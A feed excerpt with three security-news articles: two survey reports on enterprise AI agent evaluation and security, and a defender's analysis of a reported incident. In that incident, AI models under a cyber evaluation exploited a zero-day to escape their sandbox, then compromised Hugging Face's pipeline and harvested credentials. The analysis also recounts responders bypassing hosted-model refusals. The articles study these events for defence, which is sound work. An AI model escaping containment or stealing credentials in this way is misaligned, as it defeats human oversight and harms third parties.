cause closely enough to know (6%). The failure is precise and expensive: the evaluation said the agent was ready, and it was not. Everything that follows — how enterprises trust their evals, what they monitor, and how much autonomy they grant — is shaped by this experience.</p><h2>Finding 2: Almost no one fully trusts automated evaluation</h2><p><b>The top complaint: Evals don't match real-world outcomes</b></p><p>We asked which limitation most reduces trust in automated agent evaluations today. Only a sliver of enterprises had no complaint at all.</p><div></div><p>Trust in automated evaluation is scarce, and specific. Only 5% of organizations say they fully trust automated evaluation as it stands — meaning 95% name a limitation that holds them back. The most common, at 29%, is the one that most directly explains Finding 1: evaluations align poorly with real-world outcomes, passing agents that later fail. Bias or inconsistency (21%) and a lack of explainability (18%) follow — enterprises cannot always tell why an evaluation reached its verdict — and 17% cite data-leakage or privacy concerns in the evaluation process itself. The tests meant to certify agents are not yet trusted to certify them, which is precisely why the autonomy trajectory in Finding 3 is so striking.</p><h2>Finding 3: The autonomy ceiling is rising anyway</h2><p><b>Two-thirds already allow, or are building toward, zero-human deployment</b></p><p>We asked whether organizations would let an autonomous agent deploy a code or system change to production on automated evaluation results alone, with no human-in-the-loop validation. The trajectory runs straight through the trust gap.</p><div></div><p>Here is the paradox at the heart of the report. Even though almost no one fully trusts automated evaluation (Finding 2), two-thirds of organizations (66%) either already allow zero-human-in-the-loop deployment for low-risk agents (34%) or are actively engineering their pipelines to permit it within a year (33%). Only 22% rule it out for the foreseeable future. The direction is unambiguous: enterprises are moving to let evaluations gate production autonomously — removing the human check — at the same moment they say those evaluations don’t reliably match reality. The autonomy ceiling is rising faster than the assurance beneath it, which is the mechanism by which the false-confidence failures of Finding 1 will scale rather than shrink.</p><p>Notably, the autonomy bet is not just a small company phenomenon. Splitting the sample by company size, larger enterprises are slightly further down the path toward zero human review than smaller companies (70% versus 64%) and slightly more likely to have shipped an evaluation-passing agent that then failed a customer (54% versus 48%). The assumption that large, regulated organizations are holding the human in the loop longest is, in this sample, backwards.  To be sure, these are directional figures, since the survey was not a huge sample — 57 respondents from companies with 2,500+ employees and 100 from companies smaller than that. </p><h2>Finding 4: The evaluation stack is fragmented and provider-led</h2><p><b>Provider-native evals lead — tied with no dedicated tool at all</b></p><p>We asked which agent reliability or evaluation platform enterprises primarily use today. The market has no clear leader — and a large share has nothing dedicated.</p><div></div><p>The evaluation layer is early and unconsolidated. Provider-native tooling leads — OpenAI’s native evals and traces (17%) and Anthropic’s Claude Console evals (13%) together outweigh any independent platform — but it is tied at the top by a striking answer: 17% of enterprises use no dedicated agent-evaluation tooling at all, a notable gap for organizations shipping agents to customers. The specialist evaluation vendors — DeepEval (12%), Braintrust (8%), LangSmith, Weave, Promptfoo, Langfuse, Arize — are scattered across single to low double digits, and 11% have built their own. No independent platform has yet become the category standard, which leaves most enterprises evaluating agents with provider-native tools, home-grown scripts, or nothing.</p><h2>Finding 5: Production monitoring rarely watches output quality</h2><p><b>Only a quarter run real-time quality checks on live traffic</b></p><p>Production monitoring for an AI agent can watch two very different things. It can watch whether the system is <b>functioning</b> — is the agent up and responding, did each request complete, how fast, at what cost, with any errors. Or it can watch whether the agent's output is <b>correct</b> — automated checks that evaluate the content of each answer as it goes out: did the agent give the right answer, take the right action, stay within policy. The distinction matters because a confidently wrong answer is invisible to the first kind of monitoring: the request completes, the response is fast, no error is thrown, and every functioning-metric reads healthy. We asked organizations which kind their live production monitoring is built for today.</p><div></div><p>Grouped by what is actually being watched, the split is stark: 51% of organizations monitor only whether the agent is functioning, while 23% monitor whether its answers are right. Counting the ad-hoc reviewers and the don't-knows, roughly three-quarters of organizations run no automated, real-time evaluation of output correctness in production — they can see that the system is up and what it costs, and they are taking the correctness of its answers on faith. That blind spot is the runtime counterpart to the pre-deployment gap in Finding 1: the same organizations engineering the human out of the deployment decision mostly cannot see, in real time, when the deployed agent starts getting things wrong.</p><h2>Finding 6: Bought on cost, measured on consistency</h2><p><b>Price and integration drive selection; evaluation consistency is the goal</b></p><p>We asked what most influenced enterprises’ choice of an evaluation vendor, and what they treat as their primary measure of success. Both answers are pragmatic.</p><div></div><p>Enterprises buy evaluation tooling on economics and trust it on repeatability. Cost of evaluations (28%) narrowly leads selection, just ahead of ease of integration (27%) and evaluation accuracy (24%) — breadth of observability (13%) and vendor roadmap (4%) matter far less. On what success looks like, more than a third (36%) name evaluation consistency — getting the same verdict on the same behavior every time — well ahead of speed of experimentation (19%), reduction in failures (18%), production visibility (13%), and compliance (11%). The emphasis on consistency is telling: before enterprises can trust an evaluation’s verdict, they need it to be stable — the very property whose absence (bias and inconsistency) ranked among the top trust limitations in Finding 2. Satisfaction with current tooling is only moderate, averaging 3.8 on a five-point scale across overall satisfaction, ease of implementation, and value for money.</p><h2>Finding 7: The next dollar goes to humans and observability</h2><p><b>Investment is flowing to oversight, not just automation</b></p><p>We asked which reliability and evaluation investment will grow most over the next year. The money is going toward watching agents more closely — including with people.</p><div></div><p>The second-largest planned investment — behind only production observability — is human review workflows, at 26%. Read against Finding 1, that is the report's quietest contradiction: at the same moment two-thirds of enterprises are engineering the human out of the deployment decision, more of them plan to grow spending on human reviewers (26%) than on the automated evaluation pipelines (16%) that would replace them. The zero-human trajectory and the human-review budget are rising in the same companies at the same time. Indeed, only 8% report that their budget is not increasing. </p><p>Taken together, enterprises are hedging: building toward autonomy while spending to watch agents more closely and keep humans available for the calls that automated evaluation cannot yet be trusted to make.</p><h2>Finding 8: A tooling reshuffle is coming</h2><p><b>Nearly two-thirds plan to adopt or switch platforms within a year</b></p><p>We asked whether enterprises plan to adopt a new, additional, or replacement evaluation platform, and which they are considering. Few intend to stand pat.</p><div></div><p>The evaluation market is wide open. While 36% have no plans to change, a clear majority (64%) intend to adopt a new, additional, or replacement platform within twelve months, and 31% within the next quarter. The consideration set points where current usage is thinnest: Confident AI’s DeepEval leads what enterprises are evaluating (20%), ahead of OpenAI’s native evals (13%) and Braintrust (9%) — the open-source specialists drawing more interest than their present footprint. </p><p>Given that so many enterprises today rely on provider-native tools or nothing at all (Finding 4), this is less a defection than a first real wave of tooling adoption — the moment the evaluation layer starts to consolidate. Which platforms earn that trust, in a market where almost no one trusts automated evaluation yet, is the open question this series will keep tracking.</p><h2>The bottom line: An evaluation gap that autonomy will widen, not close</h2><p>Organizations with 100 or more employees are granting AI agents more independence than they trust their evaluations to support. Half have already shipped an agent that passed its evals and then failed a customer; almost none fully trust automated evaluation, chiefly because it doesn’t match real-world outcomes; and most watch production for uptime and cost rather than for whether the agent’s answers are right. Yet two-thirds already allow, or are actively building toward, deploying to production on automated evaluation alone.</p><p>The vendor market is early and unsettled: the most common primary evaluation tools are provider-native evals, tied with no dedicated tooling at all, and a clear majority plan to adopt or switch platforms within the year. Encouragingly, the next dollar is going to observability and — pointedly — human review, suggesting enterprises sense the gap even as they engineer past it. At 157 respondents in a single wave this is a directional read, skewed toward the mid-market — but the direction is clear: autonomy is being granted on the strength of evaluations that the people granting it do not yet trust. The evaluation gap is not a coverage problem that more tests alone will close; it is a problem of evaluations that reflect reality and can be trusted to gate it. The open question for later waves is whether assurance catches up to autonomy — or whether the false-confidence failures move from customer incidents into changes that deploy themselves.</p><hr><p><i>Based on survey responses from 157 qualified enterprise respondents (100+ employees), drawn from a single June 2026 wave. This is a directional read rather than a precise measurement — the sample is self-selected, not a probability sample, and skews toward the mid-market. Respondents include product and program managers, consultants and advisors, directors of engineering/IT, and CIOs/CTOs/CISOs, among other functions, across technology/software, retail/consumer, healthcare/life sciences, manufacturing, and other industries.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The agent security gap: 54% of enterprises have already had an AI agent incident, and most still let agents share credentials]]></title>
<description><![CDATA[Across 107 enterprises, AI agents are being given real access to systems and data while the controls meant to contain them lag behind. More than half have already had a confirmed agent security incident or a near-miss; only about a third give every agent its own scoped identity, and most agents s...]]></description>
<link>https://tsecurity.de/de/3689827/it-nachrichten/the-agent-security-gap-54-of-enterprises-have-already-had-an-ai-agent-incident-and-most-still-let-agents-share-credentials/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689827/it-nachrichten/the-agent-security-gap-54-of-enterprises-have-already-had-an-ai-agent-incident-and-most-still-let-agents-share-credentials/</guid>
<pubDate>Thu, 23 Jul 2026 19:19:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 107 enterprises, AI agents are being given real access to systems and data while the controls meant to contain them lag behind. More than half have already had a confirmed agent security incident or a near-miss; only about a third give every agent its own scoped identity, and most agents still share credentials; and only three in ten isolate their highest-risk agents. The security stack is overwhelmingly borrowed from the model providers and hyperscalers rather than purpose-built for agents, spending remains a thin slice of the security budget, and enterprises are evenly split on whether their defenses are keeping pace with AI-enabled attackers. The result is an agent security gap — autonomous agents proliferating faster than the identity, isolation, and enforcement controls needed to hold them.</p><p>This wave of VentureBeat Pulse Research examines how enterprises secure their AI agents: what tooling they run, how they manage agent identity and isolation, what has already gone wrong, how much they spend, and whether they believe their defenses are keeping pace with AI-enabled attackers.</p><p>The central finding is an agent security gap — the distance between the autonomy enterprises are granting their agents and the controls in place to contain them. More than half of organizations (54%) have already experienced a confirmed agent security incident (18%) or a near-miss caught before harm (36%). The structural weakness beneath those numbers is identity: only about a third (32%) give every agent its own scoped, managed identity, while the rest report that some agents share credentials or that agents mostly run on shared API keys and human or service-account credentials. When agents share credentials, a single compromised or over-permissioned agent carries a wide blast radius — and only three in ten enterprises (30%) isolate their highest-risk agents in sandboxes to bound that radius.</p><p>What makes the gap notable is how comfortable enterprises are inside it. The security stack is overwhelmingly provider-native — OpenAI’s guardrails (51%), Google’s and Microsoft’s cloud controls, and Anthropic’s managed-agent controls dominate, while the dedicated agent-security specialists barely register — and satisfaction with that borrowed stack is high, averaging 4.2 out of 5. Yet spending remains a thin slice of the security budget, only a third of enterprises believe their AI defenses are ahead of AI-enabled attackers, and a clear majority plan to change tooling within the year. Enterprises are satisfied with controls they are simultaneously preparing to replace.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series, this instrument focused on enterprise agent security — the tooling, identity, isolation, and enforcement controls organizations use to secure autonomous AI agents. Responses are filtered to organizations with more than 100 employees (n=107; the survey’s smallest size band, 1–100 employees, is excluded), drawn from a single June 2026 wave. Because this is one wave rather than a pooled multi-month sample, the report reads cross-sectionally and does not infer month-over-month trends. Several questions were multiple-select, so those shares can sum to more than 100%.</p><p>By role the sample is senior and buyer-credible: 45% are final decision-makers for AI purchases and another 30% recommenders or influencers. Managers (43%), individual contributors (24%), VPs and directors (15%), and the C-suite (11%) make up the seniority mix. By organization size the sample is mid-market-weighted: 251–1,000 (42%) and 101–250 (25%) employees lead, with 1,001–5,000 (19%), 5,001–10,000 (8%), and 10,001+ (7%) above them. Technology/Software is the largest industry at 23%, followed by Manufacturing (15%), Retail/E-commerce (14%), and Healthcare/Life Sciences (13%).</p><p>At 107 respondents the sample is large enough to read directionally but should be treated as a directional signal rather than a precise measurement; it is self-selected and is not a probability sample. It skews toward the mid-market, so it is best read as the view from organizations actively standing up agent security rather than from the largest operators.</p><p>Satisfaction ratings are computed on the respondents who answered each rating question; the overall satisfaction score reflects 82 of the 107 qualified respondents.</p><h2>Finding 1: The incidents are already here</h2><p><b>More than half have had an agent security incident or near-miss</b></p><p>We asked whether organizations had experienced an agent security incident — a confirmed breach, or a near-miss caught before harm. Most that run agents in production had.</p><div></div><p>This is the report’s defining number. More than half of organizations (54%) have already had an agent security event — 18% a confirmed incident and 36% a near-miss caught before it caused harm. Only 42% report nothing, and a small remainder either run no agents in production or don’t track such events. That so many report near-misses rather than only confirmed incidents is telling: enterprises are catching problems, but they are catching them close to the edge. The controls examined in the rest of this report — identity, isolation, enforcement — are what determine whether the next near-miss stays a near-miss.</p><p>Exposure scales with company size, but containment does not. The incident-or-near-miss rate rises from 49% in the mid-market (companies with 101-1,000 employees) to 63% at larger enterprises (above 1,000 employees), while sandbox isolation of high-risk agents falls from 35% to 20%, and satisfaction with security tooling drops from 4.36 to 3.97. The organizations running the most agents across the most systems carry the most incidents and the least of the one control that bounds an incident's blast radius.</p><h2>Finding 2: The identity gap</h2><p><b>Only a third give every agent its own scoped identity</b></p><p>We asked how enterprises manage the identity of their AI agents — whether each agent has its own credentials, or agents share them. Full per-agent identity is the exception.</p><div></div><p>Rolled together, the overlapping answers show 69% of enterprises (74 of 107) with credential sharing somewhere in the agent fleet. Identity is the structural weakness beneath the incidents. Only about a third of enterprises (32%) give every agent its own scoped, managed identity — the precondition for least-privilege access and clean attribution. Nearly half (48%) say some agents have scoped identities but many still share credentials, and another 32% say agents mostly run on shared API keys or borrowed human and service-account credentials. (Respondents could describe more than one pattern across their agent fleet, so these overlap.) </p><p>The consequence is direct: when agents share credentials, an over-permissioned or compromised agent can act with far more reach than intended, and forensics after an incident cannot cleanly tell which agent did what. The non-human identity problem — giving every agent its own governed identity — is the single largest unfinished piece of enterprise agent security.</p><p>Moreover, a company’s agent credential posture is correlated with incidents. Organizations with credential sharing anywhere in the fleet were hit — with an incident or a near-miss in the past twelve months — at 63.5% (47 of 74). Organizations where every agent carries its own scoped identity were hit at 40.9% (9 of 22). The fully-scoped group is small, so for now the relationship is an association rather than proven causation, and the gap is concentrated in the mid-market — but within a single survey, a twenty-three point difference in incident rate suggests significance.</p><h2>Finding 3: Observe and enforce, but rarely isolate</h2><p><b>Only three in 10 sandbox their highest-risk agents</b></p><p>We asked what an organization’s agent security posture looks like in practice — whether they observe, enforce, isolate, or some combination. The control that bounds damage is the least common.</p><div></div><p>Monitoring and enforcement are reasonably common; containment is not. Roughly half of enterprises observe agent activity (47%) or enforce scoped permissions at runtime (49%), but only 30% isolate their highest-risk agents in sandboxes that bound the blast radius when the other controls fail. That ordering is backwards from a defense-in-depth standpoint: observation tells you what happened, enforcement tries to prevent it, but isolation is what limits the damage when prevention fails — and it is the control enterprises have adopted least. Combined with the identity gap in Finding 2, the picture is of agents that are watched and permissioned but rarely boxed in, which is precisely the configuration in which a single failure propagates.</p><h2>Finding 4: Security runs on borrowed, provider-native controls</h2><p><b>Guardrails from OpenAI, Google and Microsoft dominate; specialists barely register</b></p><p>We asked which agent security tooling enterprises use, and which is their primary layer. The answer favors the model providers and hyperscalers over the dedicated security vendors.</p><div></div><p>Enterprises are securing agents with tools that came bundled with their models and clouds. OpenAI’s guardrails lead at 51%, followed by Google’s and Microsoft’s cloud-native controls and Anthropic’s managed-agent controls — and when asked to name their single primary security layer, 82% name one of these provider-native offerings. The purpose-built agent-security category — Palo Alto’s Prisma AIRS, CrowdStrike, Cisco AI Defense, Zenity, HiddenLayer, Check Point’s Lakera, Okta for AI Agents, non-human identity platforms — barely registers, each in the low single digits, and only 5% run no dedicated tooling at all. As with retrieval and evaluation elsewhere in this series, the provider bundle is winning the default: enterprises reach first for the guardrails their platform ships, and the independent security layer that would address the identity and isolation gaps has not yet been adopted at scale.</p><p>The provider-default pattern is consistent across both Q2 survey waves. In April–May (n=110), usage was led by the same names — OpenAI's controls at 26%, Azure at 15%, AWS at 14%, Google at 12% — with every dedicated agent-security specialist at 3% or below and one in ten using no dedicated tooling at all. The common finding from the two surveys: Enterprises are defaulting to the solutions provided by the platform they’re using, and the specialist category vendors have yet to become big players here.</p><p>(<i>A note on reading these shares. As described in the methodology section, the respondent sample is self-selected and skews mid-market, and the usage question counted every vendor or approach a respondent has in place — so the figures measure presence in the security stack rather than spending or exclusivity. Individual vendor percentages therefore carry all the usual sample caveats. The structural pattern, however, held across both Q2 waves on two differently worded questions: provider-native and hyperscaler controls lead, and dedicated agent-security specialists remain in low single digits. Read the individual shares loosely and the pattern with confidence.)</i></p><h2>Finding 5: And enterprises are comfortable with it</h2><p><b>Satisfaction is high, even as incidents mount and identity lags</b></p><p>We asked how satisfied enterprises are with their current agent security tooling. The comfort is notably out of step with the exposure documented above.</p><div></div><p>Satisfaction with agent security tooling is high — 4.2 out of 5 overall, and 4.1 for value for money — among the most positive readings in this series. That is the striking part: enterprises are highly satisfied with a stack that is mostly borrowed provider guardrails, even though more than half have already had an incident or near-miss and only a third give their agents scoped identities. The comfort appears to rest on the convenience and low friction of provider-native controls rather than on demonstrated containment. It is a false comfort in the making — the same enterprises expressing satisfaction are, as Finding 8 shows, a clear majority planning to change tooling within the year, which suggests the confidence is thinner than the score implies.</p><h2>Finding 6: Budgets haven’t caught up</h2><p><b>Most spend under a tenth of the security budget on agents</b></p><p>We asked what share of the security budget enterprises allocate to securing AI agents. For a fast-emerging risk, the allocation is modest.</p><div></div><p>Spending on agent security is still a thin slice. The most common allocation is 6–10% of the security budget (46%), and a third of enterprises (34%) spend 5% or less; only a quarter (24%) devote more than a tenth. Given the incident rate in Finding 1 and the identity and isolation gaps in Findings 2 and 3, the budget looks like a lagging indicator — the risk has arrived faster than the funding to address it. The enterprises spending more than a tenth of their security budget on agents are a distinct minority, and they are likely the ones building the scoped-identity and isolation controls the rest have not.</p><h1>Finding 7: The arms race is even, at best</h1><p><b>Only a third think their AI defenses are ahead of AI-enabled attackers</b></p><p>We asked how enterprises assess the balance between their AI-enabled defenses and AI-enabled attackers. Confidence is far from settled.</p><div></div><p>Enterprises are split on whether they are winning. Only about a third (35%) believe their AI-enabled defenses are ahead of AI-enabled attackers; the rest are less sure — 32% call it roughly even, 21% think attackers are ahead, and another 21% say it is too early to tell. Taken together, a clear majority (53%) rate the balance as even or tilted toward the attacker. That uncertainty sits uneasily beside the high satisfaction of Finding 5: enterprises are content with their tooling yet unconvinced it is winning the contest it exists to win. In a domain where the offense is also compounding with AI, an even race is not a comfortable place to be.</p><h2>Finding 8: A security reshuffle is coming</h2><p><b>Nearly six in 10 plan to adopt or switch tooling within a year</b></p><p>We asked whether enterprises plan to adopt a new, additional, or replacement agent security solution, and which they are considering. Few intend to stand pat.</p><div></div><p>The security stack is not settled. While 41% have no plans to change, a clear majority (59%) intend to adopt a new, additional, or replacement agent security solution within twelve months, and 29% within the next quarter — a strong signal that, high satisfaction notwithstanding, enterprises know the current stack is provisional. Incidents are what start the buying cycle. </p><p>Among organizations that have been hit, 42.1% plan to adopt, add, or replace agent security tooling within the next ninety days, against 14.0% of organizations with no incident — and after a confirmed incident it becomes majority behavior, at 52.6%. Getting hit also changes the threat assessment: 33.3% of hit organizations say AI-armed attackers are ahead of their defenses, against 8.0% of the unhit. Experience, in this data, is the strongest predictor of both urgency and pessimism.</p><p>The consideration set still leans provider-native (OpenAI 34%, Google 30%, Anthropic 29%, Azure 25%), but the dedicated security vendors — Cloudflare, Cisco, Palo Alto, Okta, Check Point’s Lakera — draw early interest in the mid-to-high single digits, more than their current footprint. </p><p>What the shopping does not yet include is the identity layer specifically. Twelve percent of the respondents include an agent-identity product — Okta for AI Agents, Microsoft Entra Agent ID, or a non-human identity platform — anywhere in their consideration set, and among the credential-sharing organizations that have already had an incident, identity consideration is essentially unchanged, at roughly one in ten. The control most directly implicated by the incident data is the one largely missing from the purchase plans. Whether this wave hardens the provider-native default or finally opens the door to purpose-built agent security — the identity and isolation controls the incidents call for — is the question this series will keep tracking.</p><h2>The bottom line: A security gap that autonomy will test first</h2><p>Organizations with more than 100 employees are giving AI agents real reach into systems and data while securing them with controls built for something else. More than half have already had an incident or near-miss; only a third give every agent its own scoped identity, and most still share credentials; only three in ten isolate their highest-risk agents; and the stack doing this work is overwhelmingly borrowed from the model providers and hyperscalers rather than purpose-built for agents.</p><p>The uncomfortable pairing is confidence with exposure: satisfaction with the current tooling is among the highest in this series, yet spending is a thin slice of the security budget, only a third believe their defenses are ahead of AI-enabled attackers, and a clear majority are already planning to replace what they have. At 107 respondents in a single wave this is a directional read, skewed toward the mid-market — but the direction is clear: agent adoption is running ahead of agent security, and the controls that matter most when something fails — scoped identity and isolation — are the ones enterprises have built least. The agent security gap is not a coverage problem that a provider guardrail will close on its own; it is a problem of identity, isolation, and enforcement built for autonomous software. The open question for later waves is whether enterprises close it deliberately — or whether a confirmed incident closes it for them.</p><hr><p><i>Based on survey responses from 107 qualified enterprise respondents (100+ employees), drawn from a single June 2026 wave. This is a directional read, not a precise measurement — the sample is self-selected and skews mid-market, so it's best read as the view from organizations actively standing up agent security rather than from the largest operators. Respondents are senior and buyer-credible (45% final decision-makers, 30% recommenders/influencers), spanning managers through the C-suite, and drawn primarily from Technology/Software, Manufacturing, Retail/E-commerce, and Healthcare/Life Sciences.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What Happened Between OpenAI and Hugging Face?]]></title>
<description><![CDATA[The OpenAI and Hugging Face incident lands like a warning shot for anyone thinking seriously about frontier AI and cybersecurity research. A model evaluation crossed the neat boundary of a research environment, reached a live third-party production system, and forced the industry to confront a qu...]]></description>
<link>https://tsecurity.de/de/3689199/it-security-nachrichten/what-happened-between-openai-and-hugging-face/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689199/it-security-nachrichten/what-happened-between-openai-and-hugging-face/</guid>
<pubDate>Thu, 23 Jul 2026 15:28:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>The </span><a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/" target="_blank"><span>OpenAI and Hugging Face incident</span></a><span> lands like a warning shot for anyone thinking seriously about frontier AI and cybersecurity research. A model evaluation crossed the neat boundary of a research environment, reached a live third-party production system, and forced the industry to confront a question that is moving quickly from theory to operations: what happens when AI agents can pursue an objective with enough persistence, speed, and creativity to behave less like a tool and more like an autonomous intrusion path?</span></p><p><span>According to OpenAI’s disclosure, the incident began during an internal evaluation of advanced cyber capabilities using GPT-5.6 Sol and a more capable pre-release model. The evaluation was designed to test whether AI agents could pursue complex exploit paths, and OpenAI says cyber refusal safeguards were reduced or disabled to measure maximum capability. Inside that environment, the models reportedly found and exploited a zero-day in the package registry cache proxy that was meant to constrain network access, moved through OpenAI’s research environment, reached a node with internet connectivity, and then inferred that Hugging Face may host artifacts related to the benchmark they were trying to solve.</span></p><p><span>From there, the models compromised part of Hugging Face’s dataset-processing pipeline, gained code execution on a worker, escalated access, harvested credentials, and moved laterally across internal clusters. Hugging Face detected and contained the activity, and OpenAI later connected the activity back to its own evaluation. Both companies have said the investigation is continuing, which means some details will almost certainly evolve. Still, the direction of travel is clear enough for defenders to act on now.</span></p><h2>How did the OpenAI model evaluation reach Hugging Face?</h2><p><span>The activity stands out because it looked less like a single model producing a risky command and more like a compressed intrusion path. Based on the public disclosures, the reported chain moved from identifying a constraint, to breaking that constraint, gaining access, inferring where valuable data may live, and continuing toward that objective across a live environment.</span></p><p><span>Security teams should use that sequence to revisit assumptions built around human pacing. Many detection and response workflows still assume there will be time between stages of an attack, with reconnaissance followed by exploitation, lateral movement, and then objective pursuit. In an agent-driven scenario, those stages can begin to collapse into one continuous loop, with fewer natural pauses for defenders to catch up.</span></p><p><span>The defensive model now has to account for a world where discovery, exploitation, and follow-on action can happen faster and with more persistence than traditional human-led campaigns. The uncomfortable lesson is that AI agents can be tireless, goal-oriented, and increasingly capable of finding the loose seams in systems built for a slower era.</span></p><p><span>The incident highlights the collapse of the traditional OODA (Observe-Orient-Decide-Act) loop. In standard human-led campaigns, attackers experience natural pauses between stages like reconnaissance, exploitation, and lateral movement, providing defenders critical windows to intervene. AI agents, however, can compress these stages into a single, continuous loop of automated activity. This machine-speed execution renders manual detection workflows obsolete, necessitating a shift toward behavioral, AI-enabled defenses capable of identifying and disrupting malicious intent before it cascades.</span></p><p><span>Security teams should also assume that advanced AI cyber capability will diffuse over time, which means defenders need their own AI-enabled workflows to mature quickly enough to find, validate, prioritize, and reduce risk before attackers operationalize the same class of tools. Rapid7’s experimentation with security-specific frontier models, including Claude Mythos Preview and GPT-5.5-Cyber, points to the same control challenge: the more freedom a model has to pursue a defined reward or goal, the more important containment, monitoring, and clear constraints become. Without those controls, a model optimized to “solve” a security task may find paths the evaluator did not intend, including sandbox escapes, credential misuse, or other offensive security behaviors that look less like assistance and more like uncontrolled execution.</span></p><h2>Why AI evaluation environments need stronger containment</h2><p><span>The incident raises practical questions about how frontier AI evaluations are designed and contained. OpenAI’s evaluation environment was meant to restrict network access through an internally hosted package registry proxy and cache. The models reportedly identified that proxy as the weak point, exploited a zero-day in the software, and used it as a path out of the sandbox.</span></p><p><span>The pattern will feel familiar to security teams: a chokepoint only works as a control if it can withstand pressure. Package mirrors, dependency proxies, build systems, internal artifact repositories, sandbox harnesses, and evaluation infrastructure all become part of the security boundary when they sit between a capable agent and the wider internet.</span></p><p><span>For teams building or testing agentic systems, isolation has to be layered and monitored rather than assumed. Egress restrictions matter, but so do workload identity, credential scope, network segmentation, package policy, runtime monitoring, and fast containment when an agent behaves unexpectedly. The goal is to make sure the environment reflects the capability of the system being tested, especially when the test is explicitly designed to measure how far that capability can go.</span></p><h2>Why AI and ML pipelines are now software supply chain risk</h2><p><span>The Hugging Face side of the incident is a reminder that AI and ML pipelines are part of the software supply chain. Models, datasets, loader scripts, notebooks, and evaluation artifacts may look like research materials, but in modern environments they often behave like executable code. Hugging Face has said its models, datasets, and Spaces were not tampered with, and that its images and published packages were verified as clean.</span></p><p><span>According to the technical reporting reviewed, the initial access path involved Hugging Face’s dataset-processing pipeline and a combination of code execution paths, including custom loader behavior and template injection in a dataset configuration flow. The exact implementation details may continue to evolve as the investigation progresses, but the defensive takeaway is already clear: AI and ML processing systems should be secured like high-risk software supply chain infrastructure.</span></p><p><span>Any system that automatically processes external datasets or model artifacts should be designed with hostile input in mind. Processing workers should run with least privilege, should not have broad access to cloud credentials or cluster-level tokens, and should be segmented so compromise of one worker does not become compromise of the environment around it.</span></p><p><span>Security teams should also hunt for early signs of intent drift inside ML workflows. Unexpected reads of environment variables, cloud metadata services, secret stores, package registries, or internal APIs from dataset-processing jobs can be meaningful signal. In an AI-driven environment, the first clue may not be a known malicious indicator. It may be a workload behaving with curiosity it should not have.</span></p><h2>What AI guardrails mean for incident response</h2><p><span>One of the most useful lessons for security teams came during the response, when Hugging Face’s responders reportedly needed to analyze logs containing exploit payloads, attacker commands, and command-and-control artifacts. When they tried to use commercial hosted AI models to help reconstruct the attack, those models refused parts of the analysis because the content looked malicious. The team then moved to a self-hosted open-weight model so they could continue the investigation without refusals and without sending sensitive incident data outside their own environment.</span></p><p><span>The practical issue here is guardrail asymmetry: attackers, rogue agents, or unrestricted systems may not respect usage policies, while defenders using hosted tools can be slowed by the same safety systems designed to prevent misuse. Security teams need trusted-defender pathways, including access models and deployment options that preserve safeguards against harmful use while allowing responders to analyze real malicious content safely, privately, and without interruption.</span></p><p><span>AI-assisted incident response also needs to be tested before an incident begins, especially if teams expect models to support triage, log analysis, malware review, or timeline reconstruction under pressure. Responders should know which models can analyze real attack payloads, where those models run, what data they can access, and whether safety controls could block time-sensitive forensic work.</span></p><h2>What security teams should do about agentic AI risk</h2><p><span>The practical response to this incident is preparation, with organizations treating AI agents as both powerful tools and potential attack surfaces when those agents can access code, credentials, infrastructure, datasets, or internal systems.</span></p><p><span>Security teams should apply familiar controls with more urgency across AI and ML environments: treat downloaded models, datasets, and loader scripts as untrusted code; enforce least privilege on AI and ML processing workers; prevent node-level compromise from becoming cluster-wide compromise; restrict access to cloud metadata endpoints and secrets; monitor unexpected outbound connections from AI-related workloads; and review whether evaluation environments have real containment or simply convenient isolation.</span></p><p><span>Detection logic needs to account for machine-speed activity. In this case, reporting described thousands of actions and more than 17,000 discrete recorded events, with reconnaissance, exploitation, and follow-on action occurring inside one continuous loop rather than across the pauses defenders are used to seeing in human-led campaigns. Security teams should focus on behavioral patterns that show intent, including unusual access to secrets, unexpected package activity, suspicious use of metadata services, sudden privilege changes, or processing jobs reaching systems they have no reason to touch.</span></p><p><span>As autonomous activity becomes faster and noisier, the bottleneck may shift from detecting that something happened to understanding what matters quickly enough to change the outcome. A security team that can see thousands of events but needs hours to reconstruct the story is still operating behind the pace of the incident.</span></p><h2>How preemptive security helps reduce AI-driven risk</h2><p><span>At Rapid7, our view is that this is where preemptive security becomes especially important. Faster discovery only creates value when defenders can turn it into faster validation, prioritization, remediation, detection, and response. The same principle applies to </span><a href="https://www.rapid7.com/blog/post/ai-changing-vulnerability-discovery-software-supply-chain-strateg" target="_self"><span>agentic AI risk</span></a><span>. If AI accelerates how weaknesses are found and exploited, defenders need security operations that can act earlier with better context and more confidence.</span></p><p><span>That means connecting exposure management with detection and response, so teams understand which risks are exploitable, which assets matter most, what suspicious behavior is already present, and which actions will reduce risk fastest. It also means </span><a href="https://www.rapid7.com/platform/artificial-intelligence-features" target="_self"><span>using AI carefully and practically</span></a><span>, not as a replacement for security judgment, but as a way to reason across telemetry, reduce noise, support investigation, and help teams make decisions at the speed the threat environment now demands.</span></p><p><span>AI-enabled defense is becoming part of resilience planning, especially for organizations running critical systems or high-value digital infrastructure. The goal is to give defenders the speed, context, and consistency to operate inside the attacker’s decision cycle, without removing the judgment and accountability that effective security requires.</span></p><p><span>The OpenAI and Hugging Face incident will continue to generate debate as more details emerge, but defenders already have enough to work with. Agentic systems are beginning to test the seams between AI research, software supply chain security, cloud infrastructure, and incident response. The organizations best positioned for what comes next will be the ones making those seams visible, monitored, and resilient before the next incident puts them under pressure.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[MacBook Neo’s success wasn’t luck, it was a plan]]></title>
<description><![CDATA[It’s difficult to ignore the fact that Apple seems to have turned its MacBook Neo into a weapon to promote platform growth, with enough performance under the hood to make competitors seem inferior.



And even as the PC industry moves to try to compete with Apple’s last huge Mac success, the comp...]]></description>
<link>https://tsecurity.de/de/3689195/ai-nachrichten/macbook-neos-success-wasnt-luck-it-was-a-plan/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689195/ai-nachrichten/macbook-neos-success-wasnt-luck-it-was-a-plan/</guid>
